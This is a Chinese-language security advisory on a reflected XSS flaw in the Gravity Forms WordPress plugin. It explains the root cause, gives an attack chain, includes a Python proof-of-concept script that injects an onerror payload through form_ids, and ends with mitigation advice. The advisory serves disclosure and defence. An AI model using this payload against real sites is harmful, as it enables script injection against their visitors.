CVE-2026-4406 WordPress Gravity Forms插件反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-4406

漏洞类型

反射型跨站脚本 (XSS)

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Gravity Forms Plugin for WordPress

漏洞概述

WordPress的Gravity Forms插件在所有2.9.30及以下版本中存在反射型跨站脚本（XSS）漏洞。该漏洞是因为`gform_get_config` AJAX接口的`form_ids`参数处理不当。系统使用`GFCommon::send_json()`输出数据时，将JSON包裹在HTML注释中并设置`Content-Type: text/html`，导致JSON字符串内的尖括号未被转义。未认证的攻击者可构造恶意链接诱导用户点击，利用公开且固定的`config_nonce`绕过验证，进而注入并执行任意恶意脚本。虽然该漏洞无法攻击已认证用户，但仍可被用于篡改页面内容，对用户构成安全威胁。

技术细节

漏洞的根本原因在于Gravity Forms插件在处理AJAX请求时，错误地将JSON数据以HTML格式输出。具体而言，`GFCommon::send_json()`方法在输出时使用了HTML注释包裹（``），并且HTTP响应头被错误地设置为`Content-Type: text/html`而非`application/json`。这导致浏览器将响应内容解析为HTML文档而非纯数据。由于WordPress核心的`wp_json_encode()`函数仅负责将数据编码为JSON字符串，并不会对字符串内部的尖括号（`<`、`>`）进行HTML实体转义，攻击者便可以在`form_ids`参数中注入恶意的HTML或JavaScript标签。此外，该接口依赖的`config_nonce`虽然用于验证，但其值由`wp_create_nonce('gform_config_ajax')`生成，且被公开嵌入在每一个包含Gravity Forms表单的页面中。对于未认证的访客，这个nonce在12小时的时间窗口内是完全相同的。这意味着攻击者只需访问一次页面获取nonce，即可在12小时内针对任何未认证用户构造有效的恶意请求，执行反射型XSS攻击。

攻击链分析

STEP 1

信息收集

攻击者识别目标站点使用了WordPress Gravity Forms插件，并访问包含表单的页面。

STEP 2

获取Nonce

攻击者分析页面源代码，提取嵌入其中的`config_nonce`值。该值对未认证用户在12小时内有效且恒定。

STEP 3

构造Payload

攻击者利用获取的Nonce，构造包含恶意脚本（如`<script>`或`<img onerror>`）的`form_ids`参数，准备发送至`/wp-admin/admin-ajax.php`。

STEP 4

社会工程学

攻击者将构造好的恶意链接发送给未认证的目标用户，诱导其点击。

STEP 5

执行攻击

用户点击链接后，浏览器向服务器发送AJAX请求。服务器返回带有`Content-Type: text/html`的响应，其中包含未转义的恶意脚本，导致脚本在用户浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"

# The nonce is publicly available in the page source for 12 hours.
# Extract this from the page source or use a known valid nonce.
config_nonce = "PUBLIC_NONCE_VALUE_FROM_PAGE"

# Malicious payload to inject
xss_payload = '<img src=x onerror=alert(1)>'

# Data payload for the POST request
post_data = {
    "action": "gform_get_config",
    "config_nonce": config_nonce,
    "form_ids[0]": xss_payload  # Injecting into the form_ids parameter
}

try:
    response = requests.post(target_url, data=post_data)
    
    # Check if the response Content-Type is text/html
    content_type = response.headers.get('Content-Type')
    print(f"Response Content-Type: {content_type}")

    # Verify if the payload is reflected in the response
    if xss_payload in response.text:
        print("[+] Vulnerability confirmed! Payload is reflected in the response.")
        print("Response snippet:", response.text[:200])
    else:
        print("[-] Payload not reflected or nonce might be invalid.")
        
except Exception as e:
    print(f"Error occurred: {e}")

影响范围

Gravity Forms <= 2.9.30

防御指南

临时缓解措施

如果无法立即升级插件，建议管理员在服务器端对`form_ids`参数进行严格的输入验证和过滤，移除尖括号等特殊字符。同时，可以通过修改插件代码强制将`gform_get_config`接口的响应头设置为`Content-Type: application/json`，防止浏览器将响应解析为HTML。